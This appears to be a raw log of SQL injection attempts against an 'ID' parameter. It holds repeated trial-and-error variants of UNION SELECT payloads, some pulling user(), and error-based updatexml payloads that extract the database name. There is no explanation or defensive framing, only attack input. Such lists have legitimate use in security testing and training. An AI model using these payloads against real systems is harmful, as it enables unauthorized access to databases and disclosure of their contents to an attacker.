ID:-1\
ID:-1' union select 1,2,3  -- 
ID:-1' union select 1,2,3  and 1=1 -- 
ID:-1' union select 1,2,3  and '1=1 -- 
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  AND '1=1
ID:-1' union select 1,2,3  '1=1
ID:-1' union select 1,2,3  '1
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  -- 
ID:-1' && updatexml(1,concat(0x7e, database(),0x7e),1)-- 
ID:-1' && updatexml(1,concat(0x7e, database(),0x7e),1)-- 
ID:-1' && updatexml(1,concat(0x7e, database(),0x7e),1)-- 
ID:-1' && updatexml(1,concat(0x7e, database(),0x7e),1)-- 
ID:-1' && updatexml(1,concat(0x7e, database(),0x7e),1)-- 
ID:-1' && updatexml(1,concat(0x71, database(),0x71),1)-- 
ID:-1' && updatexml(1,concat(0x71, database(),0x71),1)-- 
ID:-1' && updatexml(1,concat(0x71, database(),0x71),1)-- 
ID:-1' && updatexml(1,concat(0x71, database(),0x71),1)#
ID:1' && updatexml(1,concat(0x71, database(),0x71),1)#
ID:-1' && updatexml(1,concat(0x71, database(),0x71),1)#
ID:-1' union select 1,2,3
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,user(),3 -- 
ID:-1' union select 1,user(),3 -- 
ID:-1 union select 1,user(),3 -- 
ID:-1 union select 1,user(),3
ID:-1 union select 1,user(),3 - -
ID:-1 union select 1,2,3--
ID:-1 union select 1,2,3--
ID:-1 union select 1,2,3--
ID:-1' union select 1,2,3--
ID:-1' union select 1,2,3--
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 #
ID:-1' union select 1,2,3 #
